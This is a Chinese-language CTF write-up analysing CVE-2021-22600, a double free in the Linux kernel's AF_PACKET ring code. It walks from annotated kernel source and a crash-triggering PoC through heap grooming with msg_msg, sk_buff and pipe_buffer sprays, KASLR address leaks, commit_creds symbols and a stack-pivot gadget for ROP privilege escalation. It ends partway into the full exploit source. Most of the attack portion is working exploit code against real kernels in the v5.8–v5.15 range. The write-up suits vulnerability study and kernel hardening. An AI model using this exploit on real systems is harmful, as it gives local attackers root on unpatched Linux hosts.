0%

msg_msg-sk_buff+pipe_buffer attack+CVE-2021-22600

CVE-2021-22600

1
2
/ $ cat /proc/version 
Linux version 5.11.16 (arttnba3@ubuntu) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #1 SMP Sat Jun 3 16:53:03 PDT 2023
1
2
3
4
5
6
7
8
9
10
# Boot the challenge kernel (bzImage + rootfs.cpio) under QEMU with 256M RAM and one core.
# Mitigations enabled for the guest: SMEP and SMAP (via -cpu), PTI and KASLR (via the kernel cmdline).
# -s opens QEMU's gdb stub so a debugger can attach to the guest.
# Fix: the kernel parameter was misspelled "qiet"; it is now "quiet".
qemu-system-x86_64 \
-m 256M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 quiet loglevel=3 oops=panic panic=-1 pti=on kaslr" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=1 -s
  • smap,smep,pti,kaslr
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/sh
# Guest init script: mounts the pseudo filesystems, locks down the flag,
# drops to an unprivileged shell, and powers the VM off when that shell exits.

# Pseudo filesystems and device nodes.
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
# The flag is owned by root and readable by root only.
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

# Restrict kernel pointer exposure and dmesg access for the unprivileged user.
echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

# Interactive shell running as uid/gid 1000.
setsid /bin/cttyhack setuidgid 1000 /bin/sh

# Reached once the shell exits: unmount and power off immediately.
umount /proc
umount /sys

poweroff -d 0 -f

内核源码下载:Index of /pub/linux/kernel/v5.x/

漏洞分析

本题目的漏洞是 CVE-2021-22600,该漏洞影响版本为:Linux Kernel v5.8.0 - v5.15.0

漏洞位于 /net/packet/af_packet.c 文件,rx_owner_map 引用了 pg_vec,切换到 TPACKET_V3 协议版本中,在 packet_set_ring() 函数的末尾,对 pg_vec 释放了一次,并未对 rx_owner_map 指针置为 NULL

直到从 TPACKET_V3 协议版本切换到 TPACKET_V2 协议版本后,再次到达 packet_set_ring() 函数的末尾,bitmap_free() 函数对 rx_owner_map 指针进行释放,触发 double free 漏洞

核心函数 packet_set_ring 源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
/*
 * packet_set_ring - install or tear down the RX/TX ring buffer of a packet socket.
 * @sk:      socket whose ring is being changed
 * @req_u:   user request; tp_block_nr != 0 requests a new ring, 0 requests teardown
 * @closing: when non-zero, the "mapped"/"read pending" busy checks are skipped
 * @tx_ring: non-zero selects po->tx_ring, zero selects po->rx_ring
 *
 * Returns 0 on success, or -EBUSY / -EINVAL / -ENOMEM as set along the paths below.
 *
 * The translated annotations describe the three PACKET_RX_RING calls of the
 * CVE-2021-22600 proof of concept (V3 setup, V3 teardown, V2 teardown).
 */
static int packet_set_ring(struct sock *sk, union tpacket_req_u *req_u,
int closing, int tx_ring)
{
struct pgv *pg_vec = NULL;
struct packet_sock *po = pkt_sk(sk);
unsigned long *rx_owner_map = NULL;
int was_running, order = 0;
struct packet_ring_buffer *rb;
struct sk_buff_head *rb_queue;
__be16 num;
int err = -EINVAL;
/* Added to avoid minimal code churn */
struct tpacket_req *req = &req_u->req;

rb = tx_ring ? &po->tx_ring : &po->rx_ring;
rb_queue = tx_ring ? &sk->sk_write_queue : &sk->sk_receive_queue;

err = -EBUSY;
if (!closing) {
if (atomic_read(&po->mapped))
goto out;
if (packet_read_pending(rb))
goto out;
}

if (req->tp_block_nr) { /* In the PoC, only the first PACKET_RX_RING setsockopt (non-zero tp_block_nr) enters this branch */
unsigned int min_frame_size;

/* Sanity tests and some calculations */
err = -EBUSY;
if (unlikely(rb->pg_vec))
goto out;

switch (po->tp_version) {
case TPACKET_V1:
po->tp_hdrlen = TPACKET_HDRLEN;
break;
case TPACKET_V2:
po->tp_hdrlen = TPACKET2_HDRLEN;
break;
case TPACKET_V3:
po->tp_hdrlen = TPACKET3_HDRLEN;
break;
}

err = -EINVAL;
if (unlikely((int)req->tp_block_size <= 0))
goto out;
if (unlikely(!PAGE_ALIGNED(req->tp_block_size))) /* note: tp_block_size must be aligned to PAGE_SIZE */
goto out;
min_frame_size = po->tp_hdrlen + po->tp_reserve;
if (po->tp_version >= TPACKET_V3 &&
req->tp_block_size <
BLK_PLUS_PRIV((u64)req_u->req3.tp_sizeof_priv) + min_frame_size)
goto out;
if (unlikely(req->tp_frame_size < min_frame_size))
goto out;
if (unlikely(req->tp_frame_size & (TPACKET_ALIGNMENT - 1)))
goto out;

rb->frames_per_block = req->tp_block_size / req->tp_frame_size;
if (unlikely(rb->frames_per_block == 0))
goto out;
if (unlikely(rb->frames_per_block > UINT_MAX / req->tp_block_nr))
goto out;
if (unlikely((rb->frames_per_block * req->tp_block_nr) !=
req->tp_frame_nr))
goto out;

err = -ENOMEM;
order = get_order(req->tp_block_size);
pg_vec = alloc_pg_vec(req, order); /* for a TPACKET_V3 RX ring, init_prb_bdqc() below also stores this pg_vec in sock->rx_ring->prb_bdqc->pkbdq */
if (unlikely(!pg_vec))
goto out;
switch (po->tp_version) {
case TPACKET_V3:
/* Block transmit is not supported yet */
if (!tx_ring) { /* RX ring only */
init_prb_bdqc(po, rb, pg_vec, req_u);
} else {
struct tpacket_req3 *req3 = &req_u->req3;

if (req3->tp_retire_blk_tov ||
req3->tp_sizeof_priv ||
req3->tp_feature_req_word) {
err = -EINVAL;
goto out_free_pg_vec;
}
}
break;
default:
if (!tx_ring) {
rx_owner_map = bitmap_alloc(req->tp_frame_nr,
GFP_KERNEL | __GFP_NOWARN | __GFP_ZERO);
if (!rx_owner_map)
goto out_free_pg_vec;
}
break;
}
}
/* Done */
else {
err = -EINVAL;
if (unlikely(req->tp_frame_nr)) /* on the 2nd and 3rd PACKET_RX_RING calls tp_frame_nr must be 0, otherwise we bail out right here */
goto out;
}

/* Detach socket from network */
spin_lock(&po->bind_lock);
was_running = po->running;
num = po->num;
if (was_running) {
po->num = 0;
__unregister_prot_hook(sk, false);
}
spin_unlock(&po->bind_lock);

synchronize_net();

err = -EBUSY;
mutex_lock(&po->pg_vec_lock);
if (closing || atomic_read(&po->mapped) == 0) {
err = 0;
spin_lock_bh(&rb_queue->lock);
swap(rb->pg_vec, pg_vec); /*
 * 1st PACKET_RX_RING call: the local pg_vec is swapped to NULL, so nothing is freed.
 * 2nd PACKET_RX_RING call: the ring's pg_vec is swapped back into the local and freed below,
 * while packet_ring_buffer->prb_bdqc->pkbdq is left as a dangling pointer. */
if (po->tp_version <= TPACKET_V2)
swap(rb->rx_owner_map, rx_owner_map); /*
 * Only reached on the 3rd PACKET_RX_RING call (socket already switched to TPACKET_V2).
 * rx_owner_map and prb_bdqc are members of the same union, so
 * packet_ring_buffer->rx_owner_map and packet_ring_buffer->prb_bdqc->pkbdq hold the same value.
 * The local rx_owner_map thus receives the dangling pointer; freeing it below is the double free. */
rb->frame_max = (req->tp_frame_nr - 1);
rb->head = 0;
rb->frame_size = req->tp_frame_size;
spin_unlock_bh(&rb_queue->lock);

swap(rb->pg_vec_order, order);
swap(rb->pg_vec_len, req->tp_block_nr);

rb->pg_vec_pages = req->tp_block_size/PAGE_SIZE;
po->prot_hook.func = (po->rx_ring.pg_vec) ?
tpacket_rcv : packet_rcv;
skb_queue_purge(rb_queue);
if (atomic_read(&po->mapped))
pr_err("packet_mmap: vma is busy: %d\n",
atomic_read(&po->mapped));
}
mutex_unlock(&po->pg_vec_lock);

spin_lock(&po->bind_lock);
if (was_running) {
po->num = num;
register_prot_hook(sk);
}
spin_unlock(&po->bind_lock);
if (pg_vec && (po->tp_version > TPACKET_V2)) {
/* Because we don't support block-based V3 on tx-ring */
if (!tx_ring)
prb_shutdown_retire_blk_timer(po, rb_queue);
}

out_free_pg_vec:
bitmap_free(rx_owner_map); /* frees rx_owner_map (unconditionally, whatever the swap left in it) */
if (pg_vec)
free_pg_vec(pg_vec, order, req->tp_block_nr); /* frees pg_vec */
out:
return err;
}

其他次要部分源码如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/*
 * Excerpt of init_prb_bdqc(): resets the ring's tpacket_kbdq_core and records
 * pg_vec in it. The "......" line marks code elided by the write-up.
 */
static void init_prb_bdqc(struct packet_sock *po,
struct packet_ring_buffer *rb,
struct pgv *pg_vec,
union tpacket_req_u *req_u)
{
struct tpacket_kbdq_core *p1 = GET_PBDQC_FROM_RB(rb);
struct tpacket_block_desc *pbd;

memset(p1, 0x0, sizeof(*p1));

p1->knxt_seq_num = 1;
p1->pkbdq = pg_vec; /* sock->rx_ring->prb_bdqc->pkbdq now references pg_vec; this second reference is what makes the bug possible */
......
}
1
2
3
4
5
6
7
8
9
10
11
12
13
/* Excerpt of struct packet_ring_buffer; "......" marks fields elided by the write-up. */
struct packet_ring_buffer {
struct pgv *pg_vec;
......
union { /* rx_owner_map and prb_bdqc are members of the same union, so they share storage */
unsigned long *rx_owner_map;
struct tpacket_kbdq_core prb_bdqc;
};
};

struct tpacket_kbdq_core {
struct pgv *pkbdq;
......
};

下面是触发内核报错的 Poc:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

#define PAGE_SIZE 0x1000

/*
 * Proof of concept that only triggers the kernel BUG: one AF_PACKET socket,
 * a TPACKET_V3 RX ring setup, a zeroed RX ring request, a switch to
 * TPACKET_V2, and a second zeroed RX ring request.
 * save_status(), bind_core(), unshare_setup() and err_exit() are not defined
 * in this listing (presumably they come from kernelpwn.h).
 */
int main(int argc , char **argv, char **envp)
{
save_status();
bind_core(0);
unshare_setup();

int socket_fd,version,ret;
struct tpacket_req3 req3;
memset(&req3, 0, sizeof(req3));

/* Create the AF_PACKET socket */
socket_fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
if (socket_fd < 0) {
err_exit("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
}

/* Select protocol version TPACKET_V3 via setsockopt */
version = TPACKET_V3;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
if(ret < 0) {
err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
}

/* 1st PACKET_RX_RING call: a regular, valid tpacket_req3 configuration */
req3.tp_sizeof_priv = 0;
req3.tp_block_nr = 0x410 / 8;
req3.tp_block_size = 0x1000;
req3.tp_frame_size = 0x1000;
req3.tp_frame_nr = 0x410 / 8;
req3.tp_retire_blk_tov = 0;
req3.tp_feature_req_word = 0;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}

/* 2nd PACKET_RX_RING call: tp_block_nr and tp_frame_nr (and all other fields) set to 0 */
req3.tp_sizeof_priv = 0;
req3.tp_block_nr = 0;
req3.tp_block_size = 0;
req3.tp_frame_size = 0;
req3.tp_frame_nr = 0;
req3.tp_retire_blk_tov = 0;
req3.tp_feature_req_word = 0;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}

/* Switch the protocol version to TPACKET_V2 via setsockopt */
version = TPACKET_V2;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &version, sizeof(version));
if(ret < 0) {
err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
}

/* 3rd PACKET_RX_RING call: tp_block_nr must again be 0 */
req3.tp_sizeof_priv = 0;
req3.tp_block_nr = 0;
req3.tp_block_size = 0;
req3.tp_frame_size = 0;
req3.tp_frame_nr = 0;
req3.tp_retire_blk_tov = 0;
req3.tp_feature_req_word = 0;
ret = setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &req3, sizeof(req3));
if (ret < 0){
err_exit("[-] setsockopt (PACKET_RX_RING)");
}

return 0;
}
1
2
3
4
5
6
7
/ $ ./exp
[*] Status has been saved.
[*] Process binded to core 0
[ 48.293367] kernel BUG at mm/slub.c:305!
[ 48.294485] invalid opcode: 0000 [#1] SMP PTI
[ 48.294770] CPU: 0 PID: 122 Comm: exp Not tainted 5.11.16 #1
[ 48.295009] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014

触发过程详解:

  • 第一次调用 setsockopt 设置 RX_RING:
    • 在执行 packet_set_ring 函数过程中,pg_vec 指向 alloc_pg_vec 函数分配的内存,并且调用 init_prb_bdqc 函数(导致 pg_vec 被 sock->rx_ring->prb_bdqc->pkbdq 引用)
    • 调用 swap 函数将 pg_vec 与 sock->rx_ring->pg_vec 交换,函数最后 pg_vec 指向 NULL,没有调用 free
  • 第二次调用 setsockopt 设置 RX_RING:
    • 调用 swap 函数将 pg_vec 与 sock->rx_ring->pg_vec 交换,此时 sock->rx_ring->pg_vec 为 NULL
    • pg_vec 指向上一步骤分配的内存,函数结尾调用 free_pg_vec 释放 pg_vec,此时 packet_ring_buffer->prb_bdqc->pkbdq 成为悬空指针
  • 由于 sock->rx_ring->pg_vec 为 NULL,所以该套接字可以成功切换协议 TPACKET_V2
  • 第三次调用 setsockopt 设置 RX_RING:
    • 再次进入 packet_set_ring 函数,由于已经是 TPACKET_V2 协议,所以调用了 swap 函数交换了 rx_owner_map 与 sock->rx_ring->rx_owner_map
    • 由于 packet_ring_buffer 结构体的 rx_owner_map 成员和 prb_bdqc 成员属于联合体,所以 sock->rx_ring->rx_owner_map 与 sock->rx_ring->prb_bdqc->pkbdq 的值相同
    • 之前 packet_ring_buffer->prb_bdqc->pkbdq 成为悬空指针,所以在函数结尾调用 bitmap_free(rx_owner_map),等同于 free 掉 sock->rx_ring->prb_bdqc->pkbdq 这个悬空指针,造成 double free

入侵思路

先泄露内核基地址以绕过 KASLR,由于这里有两次 free,因此我们选择使用 msg_msg + sk_buff 的方法进行泄露

构造消息队列,并分别在每一个消息队列上发送两条消息:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
/* Send two messages to every queue: a primary and a secondary one, each tagged with MSG_TAG and the queue index. */
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
*(int *)&primary_msg.mtext[0] = MSG_TAG;
*(int *)&primary_msg.mtext[4] = i;
if (write_msg(msqid[i], &primary_msg, sizeof(primary_msg), PRIMARY_MSG_TYPE) < 0)
err_exit("failed to send primary msg!");

*(int *)&secondary_msg.mtext[0] = MSG_TAG;
*(int *)&secondary_msg.mtext[4] = i;
if (write_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), SECONDARY_MSG_TYPE) < 0)
err_exit("failed to send secondary msg!");

/* Part-way through the spray (after queue 1024) issue the first zeroed PACKET_RX_RING request. */
if (i == 1024){
do_free_first(socket_fd);
}
}

/* After the spray: switch to TPACKET_V2 and issue the zeroed PACKET_RX_RING request again. */
do_free_second(socket_fd);
  • 内存布局如下:

1701342306217

  • 由于 slub 算法的特性,kmalloc-1k 会被分配到相邻的内存空间,kmalloc-96 会被分配到相邻的内存空间,两者互不干扰
  • msg_queue,primary,secondary 通过 primary_msg->m_list 与 secondary_msg->m_list 相关联

第一次堆喷:构造 UAF,堆喷 sk_buff 定位 victim 队列

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
   init_socket_array(sk_sockets);
puts("[*] spray sk_buff...");
/* Per the write-up: msg_msg->m_ts is changed from 0x400-0x30 to 0x400 (NOTE(review): SECONDARY_MSG_SIZE actually expands to 0x400-0x10 - confirm) */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t *)"yhellow", *(uint64_t *)"yhellow", VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE, 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!"); /* one of the sprayed sk_buffs is expected to land on the UAF object */

victim_qid = -1;
for (int i = 0; i < MSG_QUEUE_NUM; i++)
{
if (peek_msg(msqid[i], &secondary_msg, sizeof(secondary_msg), 1) < 0){
/* peek_msg fails because this queue's msg_msg was modified; that failure is how victim_qid is located */
printf("[+] victim qid: %d\n", i);
victim_qid = i;
}
}
if (victim_qid == -1)
err_exit("failed to make the UAF in msg queue!");
  • 内存布局如下:

1701342638468

第二次堆喷:堆喷 sk_buff 伪造辅助消息,泄露 primary_msg 地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
/* msg_msg->m_ts is changed from 0x400 to 0x1000-0x30 */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, 0x1000 - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

/* The tag written by the message spray is expected at this offset in the over-read data. */
if (*(int *)&oob_msg.mtext[SECONDARY_MSG_SIZE+0x10] != MSG_TAG){
err_exit("failed to rehit the UAF object!");
}

/* Reinterpret the bytes just before that tag as the neighbouring message's msg_msg header. */
nearby_msg = (struct msg_msg*)&oob_msg.mtext[(SECONDARY_MSG_SIZE+0x10) - sizeof(struct msg_msg)];
printf("\033[32m\033[1m[+] addr of primary msg of msg nearby victim: \033[0m0x%lx\n", nearby_msg->m_list.prev);
  • 内存布局如下:

1701342780014

  • 越界读取到相邻辅助消息的 secondary_msg->msg_msg,泄露对应 primary_msg 的地址

第三次堆喷:堆喷 sk_buff 伪造辅助消息,泄露 UAF obj 地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
/* msg_msg->next is derived from nearby_msg->m_list.prev (the leaked primary_msg address); the value passed is that address minus 8 */
build_msg((struct msg_msg *)fake_secondary_msg, *(uint64_t*)"yhellow", *(uint64_t*)"yhellow", VICTIM_MSG_TYPE, sizeof(oob_msg.mtext), nearby_msg->m_list.prev - 8, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

puts("[*] arbitrary read on primary msg of msg nearby victim");
if (peek_msg(msqid[victim_qid], &oob_msg, sizeof(oob_msg), 1) < 0)
err_exit("failed to read victim msg!");

if (*(int *)&oob_msg.mtext[0x1000] != MSG_TAG)
err_exit("failed to rehit the UAF object!");

/* The primary message's header sits just before its tag; its m_list.next minus 0x400 is taken as the UAF object's address. */
nearby_msg_prim = (struct msg_msg*) &oob_msg.mtext[0x1000 - sizeof(struct msg_msg)];
victim_addr = nearby_msg_prim->m_list.next - 0x400;

printf("\033[32m\033[1m[+] addr of msg next to victim: \033[0m0x%lx\n", nearby_msg_prim->m_list.next);
printf("\033[32m\033[1m[+] addr of msg UAF object: \033[0m0x%lx\n", victim_addr);
  • 内存布局如下:

1701343615421

  • msg_msg data 的 0x1000-0x30 空间使用完毕后,程序就会根据 msg_msg->next 来确定 msg_msgseg data 的位置
  • msg_msg->next 修改为 primary_addr,就可以读取并泄露 primary->m_list.next ,也就是 secondary->msg_msg
  • 最后减去 0x400 就得到 victim_addr 了

第四次堆喷:堆喷 pipe_buffer,泄露内核基址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
   /* msg_msg->m_list is set to victim_addr (i.e. it points at itself) */
build_msg((struct msg_msg *)fake_secondary_msg, victim_addr, victim_addr, VICTIM_MSG_TYPE, SECONDARY_MSG_SIZE - sizeof(struct msg_msg), 0, 0);
if (spray_sk_buff(sk_sockets, fake_secondary_msg, sizeof(fake_secondary_msg)) < 0)
err_exit("failed to spray sk_buff!");

/* read_msg causes secondary_msg to be freed */
if (read_msg(msqid[victim_qid], &secondary_msg, sizeof(secondary_msg), VICTIM_MSG_TYPE) < 0)
err_exit("failed to receive secondary msg!");

for (int i = 0; i < PIPE_NUM; i++)
{
if (pipe(pipe_fd[i]) < 0)
err_exit("failed to create pipe!");

if (write(pipe_fd[i][1], "yhellow", 8) < 0)
err_exit("failed to write the pipe!");
}

pipe_buf_ptr = (struct pipe_buffer *) &fake_secondary_msg;
for (int i = 0; i < SOCKET_NUM; i++)
{
for (int j = 0; j < SK_BUFF_NUM; j++)
{
/* read the pipe_buffer contents back through the sk_buff */
if (read(sk_sockets[i][1], &fake_secondary_msg,
sizeof(fake_secondary_msg)) < 0)
err_exit("failed to release sk_buff!");

/* An ops value above the unrandomised kernel text base is treated as the leaked anon_pipe_buf_ops pointer. */
if (pipe_buf_ptr->ops > 0xffffffff81000000){
print_hex(pipe_buf_ptr,sizeof(struct pipe_buffer));
printf("\033[32m\033[1m[+] got anon_pipe_buf_ops: \033[0m%p\n", pipe_buf_ptr->ops);
kernel_offset = (uint64_t)pipe_buf_ptr->ops - 0xffffffff8223d800;
kernel_base = 0xffffffff81000000 + kernel_offset;
}
}
}

printf("\033[32m\033[1m[+] kernel base: \033[0m0x%lx \033[32m\033[1moffset: \033[0m0x%lx\n", kernel_base, kernel_offset);
  • 内存布局如下:

1701346455159

  • read_msg 没有设置 MSG_COPY,读取后便会从信息队列中释放 secondary_msg
  • 但是 sk_buff 中的指针并没有置空,导致 pipe_buffer 与 sk_buff 分配的区域在同一位置

接下来可以考虑伪造 pipe_buffer,构造 ROP,劫持 RIP,完成提权

1
2
3
4
5
6
pwndbg> p &init_cred
$1 = (struct cred *) 0xffffffff82889040 <init_cred>
pwndbg> p commit_creds
$2 = {int (struct cred *)} 0xffffffff810df150 <commit_creds>
pwndbg> p swapgs_restore_regs_and_return_to_usermode
$3 = {<text variable, no debug info>} 0xffffffff81e00fb0 <common_interrupt_return>

栈迁移的 gadget 有点难找,需要指令错位,但好在各个版本的内核都有这个 gadget:

1
2
3
4
5
6
7
8
.text:FFFFFFFF8130245D 8B 56 5C                      mov     edx, [rsi+5Ch]
.text:FFFFFFFF81302460 85 D2 test edx, edx
.text:FFFFFFFF81302462 0F 8E A0 00 00 00 jle loc_FFFFFFFF81302508
.text:FFFFFFFF81302462
.text:FFFFFFFF81302468 F0 FF 46 60 lock inc dword ptr [rsi+60h]
.text:FFFFFFFF8130246C 4C 8D 6B 0C lea r13, [rbx+0Ch]
.text:FFFFFFFF81302470 4C 89 EF mov rdi, r13 ; lock
.text:FFFFFFFF81302473 E8 E8 EE 9E 00 call _raw_spin_lock ; PIC mode

完整 exp 如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sched.h>
#include <string.h>
#include <sys/prctl.h>

#include "kernelpwn.h"

#define PG_NUM 256
#define PIPE_NUM 8
#define MSG_QUEUE_NUM 4096

/* Total sizes (header + payload) of the two message kinds sprayed per queue. */
#define PRIMARY_MSG_SIZE 96
/* Parenthesised so the macro expands as a single value inside larger expressions. */
#define SECONDARY_MSG_SIZE (0x400-0x10)

#define PRIMARY_MSG_TYPE 0x31
#define SECONDARY_MSG_TYPE 0x32
#define VICTIM_MSG_TYPE 0x1337
#define OTHER_MSG_TYPE 0x33
#define MSG_TAG 0xAAAAAAAA

#define PAGE_SIZE 0x1000

/*
 * do_alloc_pg_vec - open an AF_PACKET socket and configure a TPACKET_V3 RX ring on it.
 * @block_size:  tp_block_size of the ring request
 * @frame_size:  tp_frame_size of the ring request
 * @block_nr:    tp_block_nr of the ring request
 * @sizeof_priv: tp_sizeof_priv of the ring request
 * @timeout:     tp_retire_blk_tov of the ring request
 *
 * tp_frame_nr is derived as (block_size * block_nr) / frame_size.
 * Returns the socket file descriptor; every failure is reported through err_exit().
 */
int do_alloc_pg_vec(uint32_t block_size, uint32_t frame_size,
                    uint32_t block_nr, uint32_t sizeof_priv, int timeout)
{
    struct tpacket_req3 ring_req;
    int tp_version = TPACKET_V3;
    int fd;

    memset(&ring_req, 0, sizeof(ring_req));

    fd = socket(AF_PACKET, SOCK_RAW, PF_PACKET);
    if (fd < 0) {
        err_exit("[x] failed at socket(AF_PACKET, SOCK_RAW, PF_PACKET)\n");
    }

    /* The ring layout depends on the protocol version, so select it first. */
    if (setsockopt(fd, SOL_PACKET, PACKET_VERSION, &tp_version, sizeof(tp_version)) < 0) {
        err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
    }

    ring_req.tp_block_size = block_size;
    ring_req.tp_block_nr = block_nr;
    ring_req.tp_frame_size = frame_size;
    ring_req.tp_frame_nr = (block_size * block_nr) / frame_size;
    ring_req.tp_retire_blk_tov = timeout;
    ring_req.tp_sizeof_priv = sizeof_priv;
    ring_req.tp_feature_req_word = 0;

    if (setsockopt(fd, SOL_PACKET, PACKET_RX_RING, &ring_req, sizeof(ring_req)) < 0) {
        err_exit("[-] setsockopt (PACKET_RX_RING)");
    }

    return fd;
}


/*
 * do_free_first - send an all-zero PACKET_RX_RING request on @socket_fd.
 * @socket_fd: AF_PACKET socket returned by do_alloc_pg_vec()
 *
 * Every field of the tpacket_req3 is zero. Failure is reported through err_exit().
 */
void do_free_first(int socket_fd)
{
    struct tpacket_req3 zero_req;

    /* memset already clears every field, so no per-field assignment is needed. */
    memset(&zero_req, 0, sizeof(zero_req));

    if (setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &zero_req, sizeof(zero_req)) < 0) {
        err_exit("[-] setsockopt (PACKET_RX_RING)");
    }
}

/*
 * do_free_second - switch @socket_fd to TPACKET_V2, then send an all-zero
 * PACKET_RX_RING request.
 * @socket_fd: AF_PACKET socket previously passed to do_free_first()
 *
 * Failures of either setsockopt() call are reported through err_exit().
 */
void do_free_second(int socket_fd)
{
    struct tpacket_req3 zero_req;
    int tp_version = TPACKET_V2;

    if (setsockopt(socket_fd, SOL_PACKET, PACKET_VERSION, &tp_version, sizeof(tp_version)) < 0) {
        err_exit("[x] failed at setsockopt(PACKET_VERSION)\n");
    }

    /* memset already clears every field, so no per-field assignment is needed. */
    memset(&zero_req, 0, sizeof(zero_req));

    if (setsockopt(socket_fd, SOL_PACKET, PACKET_RX_RING, &zero_req, sizeof(zero_req)) < 0) {
        err_exit("[-] setsockopt (PACKET_RX_RING)");
    }
}

/*
 * User-space message buffers. Each mtext is sized as a total size minus
 * sizeof(struct msg_msg); struct msg_msg is not defined in this listing
 * (presumably a user-space copy of the kernel header from kernelpwn.h - confirm).
 */

/* Buffer for the primary message: PRIMARY_MSG_SIZE total. */
struct
{
long mtype;
char mtext[PRIMARY_MSG_SIZE - sizeof(struct msg_msg)];
}primary_msg;

/* Buffer for the secondary message: SECONDARY_MSG_SIZE total. */
struct
{
long mtype;
char mtext[SECONDARY_MSG_SIZE - sizeof(struct msg_msg)];
}secondary_msg;

/* Receive buffer for the over-long reads: one 0x1000 area minus a msg_msg header plus one minus a msg_msgseg header. */
struct
{
long mtype;
char mtext[0x1000 - sizeof(struct msg_msg) + 0x1000 - sizeof(struct msg_msgseg)];
} oob_msg;

/*
* skb_shared_info need to take 320 bytes at the tail
* so the max size of buf we should send is:
* 1024 - 320 = 704
*/
char fake_secondary_msg[704];

/*
 * Full exploit entry point for the CTF kernel described in the write-up.
 * Stages, in order: ring setup, message spray with the two ring teardown
